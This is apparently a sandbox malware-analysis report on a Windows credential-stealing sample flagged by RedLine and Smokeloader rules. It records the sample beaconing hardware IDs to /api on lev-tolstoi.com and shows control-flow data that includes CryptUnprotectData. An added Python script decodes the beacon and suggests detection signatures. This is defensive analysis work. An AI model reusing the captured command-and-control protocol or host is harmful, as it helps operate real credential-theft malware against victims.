                                                                                                                                                                                                                                                              Data Ascii: LUInLDUG6Q7N70b4tYDiVFXu6NHH+taentpiGEN8tJgFQ8YBcR69H903Es2RZEPIcTvNkd6ni3vC2gYYQtCNvFAu41hZUuhXOAJKoYz9u4AlK+nNmr6C5qPyJ1k+abCZdUK+AQxfzFfVfkuhzNXWAWROkJm/w9N6ottaUBs1xJktQ7sMJVrtW502Vjh1ANNgMU+VKTrn3k7jhn4pdjm1oFAbpjltL/Q3IDprwHCluzUoctEFzsOOZqOfD4VKAZX
                                                                                                                                                                                                                                                              2024-12-26 11:57:18 UTC1369INData Raw: 6d 46 73 44 76 6b 66 6a 53 4e 47 6d 49 43 41 51 36 79 31 4b 38 33 56 6d 72 76 71 52 67 4d 69 62 78 55 61 44 5a 48 41 43 55 4f 65 41 46 41 54 6c 62 4c 45 47 6b 6f 39 74 4a 7a 61 56 55 67 54 42 64 33 36 77 36 6f 69 76 75 36 6e 49 54 34 78 31 64 67 51 66 36 59 35 62 51 76 30 4e 6f 77 43 53 74 44 49 6e 64 6f 56 59 48 36 45 6e 4a 2b 36 2f 67 66 44 76 7a 74 41 49 31 54 45 6f 55 77 4c 70 6d 46 73 44 76 6b 66 6a 53 4e 47 6d 49 43 41 51 36 79 31 4b 38 33 56 6d 72 76 71 52 38 64 69 34 35 33 61 7a 64 6d 55 64 48 71 37 57 43 67 54 7a 46 66 34 4f 69 6f 6c 6a 4c 32 37 71 52 41 54 73 4e 43 6a 2b 32 4a 32 77 2b 49 6e 51 57 63 42 45 61 42 51 52 76 39 41 4d 53 2f 4a 37 78 32 2b 53 2f 6d 4e 68 62 6f 31 59 43 72 52 77 59 66 36 31 7a 75 79 74 32 35 55 66 33 54 46 35 58 51 6e
                                                                                                                                                                                                                                                              Data Ascii: mFsDvkfjSNGmICAQ6y1K83VmrvqRgMibxUaDZHACUOeAFATlbLEGko9tJzaVUgTBd36w6oivu6nIT4x1dgQf6Y5bQv0NowCStDIndoVYH6EnJ+6/gfDvztAI1TEoUwLpmFsDvkfjSNGmICAQ6y1K83VmrvqR8di453azdmUdHq7WCgTzFf4OioljL27qRATsNCj+2J2w+InQWcBEaBQRv9AMS/J7x2+S/mNhbo1YCrRwYf61zuyt25Uf3TF5XQn
                                                                                                                                                                                                                                                              2024-12-26 11:57:18 UTC1369INData Raw: 50 31 34 34 30 6e 43 73 32 4d 70 62 74 6c 4b 48 4c 52 35 59 72 6e 39 6e 66 4c 78 6c 4d 45 49 6b 69 31 2f 55 77 62 70 6d 45 67 4b 2f 55 65 78 46 70 4c 33 4c 57 6f 76 31 67 52 48 35 6d 5a 32 76 66 75 64 2b 63 69 77 36 31 71 4b 63 32 56 52 49 61 54 45 44 56 47 2b 52 66 5a 77 37 4a 30 78 59 44 37 57 53 47 6a 7a 65 58 79 41 30 36 6d 76 38 5a 36 45 62 6f 35 31 5a 56 4e 65 36 64 68 62 48 50 31 34 34 30 6e 43 73 32 46 4c 4b 64 67 47 42 4f 73 36 61 66 37 37 33 75 61 6c 77 49 5a 61 7a 54 73 6d 56 42 4f 37 30 68 31 48 71 31 61 32 63 4f 79 64 4d 57 41 2b 31 6b 68 31 2b 58 42 6d 71 2b 36 4f 75 63 69 77 36 31 71 4b 63 32 56 52 4e 5a 4f 43 4b 6c 4b 2b 56 66 39 4a 6b 76 35 6a 66 32 36 4e 53 6d 6e 6d 63 32 43 39 72 37 75 45 74 4c 2f 51 53 34 31 74 59 56 4e 65 36 63 78 62
                                                                                                                                                                                                                                                              Data Ascii: P1440nCs2MpbtlKHLR5Yrn9nfLxlMEIki1/UwbpmEgK/UexFpL3LWov1gRH5mZ2vfud+ciw61qKc2VRIaTEDVG+RfZw7J0xYD7WSGjzeXyA06mv8Z6Ebo51ZVNe6dhbHP1440nCs2FLKdgGBOs6af773ualwIZazTsmVBO70h1Hq1a2cOydMWA+1kh1+XBmq+6Ouciw61qKc2VRNZOCKlK+Vf9Jkv5jf26NSmnmc2C9r7uEtL/QS41tYVNe6cxb


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID | Process
3          | 192.168.2.8 | 49708       | 172.67.157.254 | 443              | 768 | C:\Users\user\Desktop\SPFFah2O2q.exe

Timestamp | Bytes transferred | Direction | Data

2024-12-26 11:57:19 UTC  280 bytes  OUT
POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=8J142MQV1V1XV7FQN
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 12835
Host: lev-tolstoi.com

2024-12-26 11:57:19 UTC  12835 bytes  OUT  (body; the sandbox shows only the first bytes, so the dump ends in a cut-off boundary)
Data Raw: 2d 2d 38 4a 31 34 32 4d 51 56 31 56 31 58 56 37 46 51 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 39 44 44 36 33 42 43 46 34 38 39 30 46 46 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 38 4a 31 34 32 4d 51 56 31 56 31 58 56 37 46 51 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 38 4a 31 34 32 4d 51 56 31 56 31 58 56 37 46 51 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 38 4a 31 34
Data Ascii (CRLF line breaks restored from the raw bytes):
--8J142MQV1V1XV7FQN
Content-Disposition: form-data; name="hwid"

09DD63BCF4890FFCAC8923850305D13E
--8J142MQV1V1XV7FQN
Content-Disposition: form-data; name="pid"

2
--8J142MQV1V1XV7FQN
Content-Disposition: form-data; name="lid"

4h5VfH--
--8J14

2024-12-26 11:57:20 UTC  1132 bytes  IN
HTTP/1.1 200 OK
Date: Thu, 26 Dec 2024 11:57:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=3ng2vbbha0pons187lk3aelu8h; expires=Mon, 21 Apr 2025 05:43:59 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pNB%2BZsDmqDgCPoL4ypgOzSlAefIiImbciGwCOUfhBZDDQYlVpxB3lWvpUR38spj8WDmoLF%2BR6zclKY%2BOcvRJcg8j0JZ58iDA%2FpKVzgFMEIp0Qq1nJ9dzrnAFM%2F%2BuMQN6p6o%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f80e488a8654232-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1787&min_rtt=1777&rtt_var=686&sent=9&recv=17&lost=0&retrans=0&sent_bytes=2836&recv_bytes=13773&delivery_rate=1572428&cwnd=214&unsent_bytes=0&cid=a4a17cd59acdac94&ts=906&x=0"

2024-12-26 11:57:20 UTC  20 bytes  IN  (chunk: size line "f" = 15 bytes of data)
Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii:
f
ok 8.46.123.189

2024-12-26 11:57:20 UTC  5 bytes  IN  (last-chunk, ends the chunked body)
Data Raw: 30 0d 0a 0d 0a
Data Ascii:
0


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID | Process
4          | 192.168.2.8 | 49709       | 172.67.157.254 | 443              | 768 | C:\Users\user\Desktop\SPFFah2O2q.exe

Timestamp | Bytes transferred | Direction | Data

2024-12-26 11:57:22 UTC  277 bytes  OUT
POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=6IMCKCBFIN3LBJ
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 15046
Host: lev-tolstoi.com

2024-12-26 11:57:22 UTC  15046 bytes  OUT  (body; the sandbox shows only the first bytes, so the dump ends in a cut-off boundary)
Data Raw: 2d 2d 36 49 4d 43 4b 43 42 46 49 4e 33 4c 42 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 39 44 44 36 33 42 43 46 34 38 39 30 46 46 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 36 49 4d 43 4b 43 42 46 49 4e 33 4c 42 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 36 49 4d 43 4b 43 42 46 49 4e 33 4c 42 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 36 49 4d 43 4b 43 42 46 49 4e 33 4c 42
Data Ascii (CRLF line breaks restored from the raw bytes):
--6IMCKCBFIN3LBJ
Content-Disposition: form-data; name="hwid"

09DD63BCF4890FFCAC8923850305D13E
--6IMCKCBFIN3LBJ
Content-Disposition: form-data; name="pid"

2
--6IMCKCBFIN3LBJ
Content-Disposition: form-data; name="lid"

4h5VfH--
--6IMCKCBFIN3LB

2024-12-26 11:57:23 UTC  1129 bytes  IN
HTTP/1.1 200 OK
Date: Thu, 26 Dec 2024 11:57:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=gnecmd8eh4uhrtj07lhgvq6uq2; expires=Mon, 21 Apr 2025 05:44:02 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t%2BiHqWQOaiZH4qKFH5VCO9mnEMJyS5H7a%2BKMOFKeLOduoGcYQ2ESOShIlxO5osV0QcegFuoPWNxhtRdr0CLWimhngeEIHu6nsqq%2BpVTH082CN5P%2BoQ9yK0YuDiAzwqI0C48%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f80e499bd687d1a-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1976&min_rtt=1970&rtt_var=751&sent=12&recv=18&lost=0&retrans=0&sent_bytes=2835&recv_bytes=15981&delivery_rate=1445544&cwnd=179&unsent_bytes=0&cid=bcfdaf2ee4120ca9&ts=843&x=0"

2024-12-26 11:57:23 UTC  20 bytes  IN  (chunk: size line "f" = 15 bytes of data)
Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii:
f
ok 8.46.123.189

2024-12-26 11:57:23 UTC  5 bytes  IN  (last-chunk, ends the chunked body)
Data Raw: 30 0d 0a 0d 0a
Data Ascii:
0
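Sessions 3 and 4 above are the same exchange repeated: a multipart POST to /api carrying three form fields (hwid, pid, lid) and a chunked "ok ..." reply. The script below is an added example, not part of the Joe Sandbox report and not code from the sample; it decodes that exchange from the report's own "Data Raw" hex (session 3's truncated request body and its two response chunks, copied verbatim) so the fields and the reassembled reply can be checked programmatically. The function names, the handling of the sandbox's cut-off final boundary and the "expected field set" check are my own assumptions; the multipart splitter and chunked decoder are generic and work on any such dump, not only this one.

```python
"""Decode the LummaC /api beacon captured in sessions 3 and 4 of the report.

Added example: the hex constants are copied from the report's "Data Raw"
rows; everything else (names, truncation handling, field check) is mine.
"""
import re

# Session 3, 2024-12-26 11:57:19 UTC, OUT: start of the 12835-byte POST body as
# shown by the sandbox.  The dump stops mid-boundary ("--8J14"), so the parser
# below has to tolerate a partial trailing delimiter.
REQUEST_BODY_HEX = """
2d 2d 38 4a 31 34 32 4d 51 56 31 56 31 58 56 37 46 51 4e 0d 0a
43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a
30 39 44 44 36 33 42 43 46 34 38 39 30 46 46 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a
2d 2d 38 4a 31 34 32 4d 51 56 31 56 31 58 56 37 46 51 4e 0d 0a
43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a
32 0d 0a
2d 2d 38 4a 31 34 32 4d 51 56 31 56 31 58 56 37 46 51 4e 0d 0a
43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a
34 68 35 56 66 48 2d 2d 0d 0a
2d 2d 38 4a 31 34
"""
# Content-Type header of the same request (copied from the report).
REQUEST_CONTENT_TYPE = "multipart/form-data; boundary=8J142MQV1V1XV7FQN"

# Session 3, 2024-12-26 11:57:20 UTC, IN: the two chunked-encoding pieces of
# the HTTP/1.1 200 response body (20 bytes, then the 5-byte last-chunk).
RESPONSE_BODY_HEX = """
66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
30 0d 0a 0d 0a
"""

# Field names present in every beacon of sessions 3 and 4 (my assumption that
# this set is the shape worth matching on).
BEACON_FIELDS = {"hwid", "pid", "lid"}


def hexdump_to_bytes(dump: str) -> bytes:
    """Turn a 'Data Raw' dump (whitespace-separated hex bytes) into bytes."""
    return bytes.fromhex("".join(dump.split()))


def boundary_from_content_type(content_type: str) -> str:
    """Extract the boundary parameter from a multipart Content-Type value."""
    m = re.search(r'boundary=("?)([^";]+)\1', content_type)
    if not m:
        raise ValueError("not a multipart Content-Type: %r" % content_type)
    return m.group(2)


def parse_multipart(body: bytes, boundary: str) -> dict:
    """Return {field name: value} for a multipart/form-data body.

    Parts are separated by '--' + boundary.  A value is cut at the next
    CRLF '--' so that a dump truncated inside the closing delimiter (as the
    sandbox's is) still yields the full last value.
    """
    delim = b"--" + boundary.encode()
    fields = {}
    for part in body.split(delim)[1:]:
        part = part.lstrip(b"\r\n")
        if part.startswith(b"--") or b"\r\n\r\n" not in part:
            continue  # closing delimiter, or headers with no body (truncated)
        head, _, value = part.partition(b"\r\n\r\n")
        name = re.search(rb'name="([^"]*)"', head)
        if name:
            value = value.split(b"\r\n--", 1)[0].rstrip(b"\r\n")
            fields[name.group(1).decode()] = value.decode("ascii", "replace")
    return fields


def decode_chunked(raw: bytes) -> bytes:
    """Reassemble an HTTP/1.1 chunked transfer-coding body."""
    out = bytearray()
    pos = 0
    while True:
        eol = raw.index(b"\r\n", pos)
        size = int(raw[pos:eol].split(b";")[0], 16)  # ignore chunk extensions
        pos = eol + 2
        if size == 0:
            return bytes(out)  # last-chunk reached; trailers are not needed here
        out += raw[pos:pos + size]
        pos += size + 2  # skip the CRLF that terminates the chunk data


def decode_beacon(body_hex: str = REQUEST_BODY_HEX,
                  content_type: str = REQUEST_CONTENT_TYPE,
                  response_hex: str = RESPONSE_BODY_HEX) -> dict:
    """Decode one request/response pair as captured in the report."""
    fields = parse_multipart(hexdump_to_bytes(body_hex),
                             boundary_from_content_type(content_type))
    reply = decode_chunked(hexdump_to_bytes(response_hex)).decode("ascii", "replace")
    return {
        "fields": fields,
        "has_beacon_fields": BEACON_FIELDS <= set(fields),
        "reply": reply,
    }


if __name__ == "__main__":
    for key, val in decode_beacon().items():
        print(f"{key}: {val}")
```

Running it on session 3's bytes yields hwid 09DD63BCF4890FFCAC8923850305D13E, pid 2, lid 4h5VfH-- and the reassembled reply "ok 8.46.123.189"; session 4 decodes identically with its own boundary (6IMCKCBFIN3LBJ). For a detection rule the stable pieces are the POST to /api, the three multipart field names, and the fixed Chrome/119 User-Agent, not the per-request boundary or the PHPSESSID, which change every time.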


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.8 | 49711 | 172.67.157.254 | 443 | 768 | C:\Users\user\Desktop\SPFFah2O2q.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-26 11:57:25 UTC | 281 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=KPY7NXQGMQLQACUMS9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 20237
Host: lev-tolstoi.com
2024-12-26 11:57:25 UTC | 15331 | OUT | Data Raw: 2d 2d 4b 50 59 37 4e 58 51 47 4d 51 4c 51 41 43 55 4d 53 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 39 44 44 36 33 42 43 46 34 38 39 30 46 46 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 4b 50 59 37 4e 58 51 47 4d 51 4c 51 41 43 55 4d 53 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4b 50 59 37 4e 58 51 47 4d 51 4c 51 41 43 55 4d 53 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 4b
Data Ascii: --KPY7NXQGMQLQACUMS9Content-Disposition: form-data; name="hwid"09DD63BCF4890FFCAC8923850305D13E--KPY7NXQGMQLQACUMS9Content-Disposition: form-data; name="pid"3--KPY7NXQGMQLQACUMS9Content-Disposition: form-data; name="lid"4h5VfH----K
2024-12-26 11:57:26 UTC | 1127 | IN | HTTP/1.1 200 OK
Date: Thu, 26 Dec 2024 11:57:26 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=qj4vtv4vdi4k8rv2vhirph1k7v; expires=Mon, 21 Apr 2025 05:44:05 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o6MOWFQzSXBJV2A9aNKQfW93lc%2FPjOgDUjPnbk0IBzinW%2F0ncJpzBs0sPS1O%2BXnyC0U0pPbaUDDaadVRZJwgsYnVW6AqMNOCDal8K2RtahqNt5lgFDw8Yd1hTs8Ks1XElf0%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f80e4aacd755e76-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1729&min_rtt=1716&rtt_var=670&sent=11&recv=27&lost=0&retrans=0&sent_bytes=2836&recv_bytes=21198&delivery_rate=1601755&cwnd=209&unsent_bytes=0&cid=5180480108fc2db0&ts=974&x=0"
2024-12-26 11:57:26 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-26 11:57:26 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Target ID: 0
Start time: 06:57:06
Start date: 26/12/2024
Path: C:\Users\user\Desktop\SPFFah2O2q.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\SPFFah2O2q.exe"
Imagebase: 0x400000
File size: 316'928 bytes
MD5 hash: D4D4B5B6CA79BB5B57E8EF3791629E47
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1722412139.00000000020C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1720458759.0000000000579000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1720458759.0000000000540000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 5
Start time: 06:57:26
Start date: 26/12/2024
Path: C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 768 -s 1812
Imagebase: 0x3d0000
File size: 483'680 bytes
MD5 hash: C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Execution Graph

Execution Coverage: 3.6%
Dynamic/Decrypted Code Coverage: 16.5%
Signature Coverage: 43.8%
Total number of Nodes: 176
Total number of Limit Nodes: 9
Control-flow Graph

• Executed
• Not Executed
control_flow_graph 0 437df0-437e0f 1 437e10-437e24 0->1 1->1 2 437e26-437e34 1->2 3 437e40-437e54 2->3 3->3 4 437e56-437e97 3->4 5 437ea0-437ec5 4->5 5->5 6 437ec7-437ede 5->6 8 437f92-437f9f 6->8 9 437ee4-437eef 6->9 11 437fa0-437fe0 8->11 10 437ef0-437f22 9->10 10->10 12 437f24-437f37 10->12 11->11 13 437fe2-43803c CoCreateInstance 11->13 14 437f40-437f82 12->14 15 438042-43807b 13->15 16 438440-43846f call 43dbf0 GetVolumeInformationW 13->16 14->14 18 437f84-437f8e 14->18 19 438080-4380bc 15->19 22 438471-438475 16->22 23 438479-43847b 16->23 18->8 19->19 21 4380be-4380e9 SysAllocString 19->21 28 43842f-43843c SysFreeString 21->28 29 4380ef-438109 CoSetProxyBlanket 21->29 22->23 24 43848d-438494 23->24 26 4384a0-4384b6 24->26 27 438496-43849d 24->27 32 4384c0-4384f0 26->32 27->26 28->16 30 438425-43842b 29->30 31 43810f-438121 29->31 30->28 33 438130-438177 31->33 32->32 34 4384f2-43852b 32->34 33->33 35 438179-4381f2 SysAllocString 33->35 36 438530-438573 34->36 37 438200-438235 35->37 36->36 38 438575-4385a5 call 41e5c0 36->38 37->37 39 438237-438261 SysAllocString 37->39 42 4385b0-4385b8 38->42 45 438413-438423 SysFreeString * 2 39->45 46 438267-438289 39->46 42->42 44 4385ba-4385bc 42->44 47 4385c2-4385d2 call 4081b0 44->47 48 438480-438487 44->48 45->30 53 438409-43840f 46->53 54 43828f-438292 46->54 47->48 48->24 50 4385d7-4385de 48->50 53->45 54->53 55 438298-43829d 54->55 55->53 56 4382a3-4382ef VariantInit 55->56 57 4382f0-438319 56->57 57->57 58 43831b-43832d 57->58 59 438331-438333 58->59 60 438339-43833f 59->60 61 4383f8-438405 VariantClear 59->61 60->61 62 438345-438353 60->62 61->53 63 438355-43835a 62->63 64 43838d 62->64 65 43836c-438370 63->65 66 43838f-4383b7 call 408020 call 408d50 64->66 67 438372-43837b 65->67 68 438360 65->68 77 4383b9 66->77 78 4383be-4383ca 66->78 71 438382-438386 67->71 72 43837d-438380 67->72 70 438361-43836a 68->70 70->65 70->66 71->70 74 438388-43838b 71->74 72->70 74->70 77->78 79 4383d1-4383f4 call 408050 call 408030 78->79 80 4383cc 78->80 79->61 80->79
APIs
• CoCreateInstance.OLE32(0044168C,00000000,00000001,0044167C,00000000), ref: 00438034
• SysAllocString.OLEAUT32()\"^), ref: 004380C3
• CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00438101
• SysAllocString.OLEAUT32()\"^), ref: 0043817E
• SysAllocString.OLEAUT32()\"^), ref: 00438238
• VariantInit.OLEAUT32(C7C6C5CC), ref: 004382A8
• VariantClear.OLEAUT32(?), ref: 004383F9
• SysFreeString.OLEAUT32(?), ref: 0043841D
• SysFreeString.OLEAUT32(?), ref: 00438423
• SysFreeString.OLEAUT32(00000000), ref: 00438430
• GetVolumeInformationW.KERNELBASE(?,00000000,00000000,66966446,00000000,00000000,00000000,00000000), ref: 00438468
Strings
Memory Dump Source
• Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
Similarity
• API ID: String$AllocFree$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
• String ID: P%R$)\"^$.H4J$O@$pq
• API String ID: 2573436264-1397720406
• Opcode ID: 99389cd6846ffddf47e3914131a3c94635c8c48cfc52d90ecef9ec7663b7e69d
• Instruction ID: 8d1c6a9ba2bf63fa8fe487279597ba15b590cfaf954231a8494ef46f424a72d4
• Opcode Fuzzy Hash: 99389cd6846ffddf47e3914131a3c94635c8c48cfc52d90ecef9ec7663b7e69d
• Instruction Fuzzy Hash: D022EFB2A483418BD314CF25C880B5BBBE5EFC9704F148A2DF5919B381E779D909CB96

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 85 415799-4157cc call 408030 call 43e6e0 90 415850 85->90 91 4157d3-4157f3 call 408020 call 43e7d0 85->91 92 415852-415869 85->92 93 415842-415847 85->93 94 415807 85->94 95 415839-41583f call 408030 85->95 96 415818-41582c call 401000 85->96 90->92 109 4157f8-415800 91->109 99 415870-4158cb 92->99 93->90 94->96 95->93 96->95 99->99 103 4158cd-4158d5 99->103 106 4158d7-4158e6 103->106 107 41591a-41597b call 401a90 103->107 110 4158f0-4158f7 106->110 114 415980-4159b4 107->114 109->90 109->92 109->93 109->94 109->95 109->96 112 415900-415906 110->112 113 4158f9-4158fc 110->113 112->107 116 415908-415917 call 43c1f0 112->116 113->110 115 4158fe 113->115 114->114 117 4159b6-4159d3 call 401dd0 114->117 115->107 116->107 122 415d60 117->122 123 415bc6-415bcb 117->123 124 415d46-415d5f call 43dbf0 117->124 125 415d66 117->125 126 415d7a-415ddf 117->126 127 4159da-4159df 117->127 128 415d3d-415d43 call 408030 117->128 129 415d6c-415d78 call 408030 117->129 131 415bd0-415bd9 123->131 124->122 132 415de0-415dfa 126->132 133 4159e0-4159e6 127->133 128->124 129->126 131->131 137 415bdb-415be2 131->137 132->132 138 415dfc-415e16 call 401dd0 132->138 133->133 139 4159e8-415a07 133->139 142 415be4-415be9 137->142 143 415c06 137->143 138->122 138->123 138->124 138->125 138->126 138->128 138->129 145 415a09-415a0c 139->145 146 415a0e 139->146 148 415c09-415c4b call 408020 142->148 143->148 145->146 150 415a0f-415a28 145->150 146->150 157 415c50-415cb6 148->157 152 415a2a-415a2d 150->152 153 415a2f 150->153 152->153 155 415a30-415a4e call 408020 152->155 153->155 162 415a54-415a5b 155->162 163 415b59-415bbf call 43dbf0 CryptUnprotectData 155->163 157->157 159 415cb8-415cc7 157->159 160 415ce1-415cf8 159->160 161 415cc9-415ccf 159->161 165 415d21-415d37 call 408cb0 160->165 166 415cfa-415d01 160->166 164 415cd0-415cdf 161->164 167 415a80-415aca call 41dae0 * 2 162->167 163->122 163->123 163->124 163->125 163->126 163->128 163->129 164->160 164->164 165->128 169 415d10-415d1f 166->169 177 415a70-415a7a 167->177 178 415acc-415ae7 call 41dae0 167->178 169->165 169->169 177->163 177->167 178->177 181 415ae9-415b11 178->181 182 415a61-415a65 181->182 183 415b17-415b2d call 41dae0 181->183 182->177 186 415b33-415b54 183->186 187 415a5d 183->187 186->177 187->182
APIs
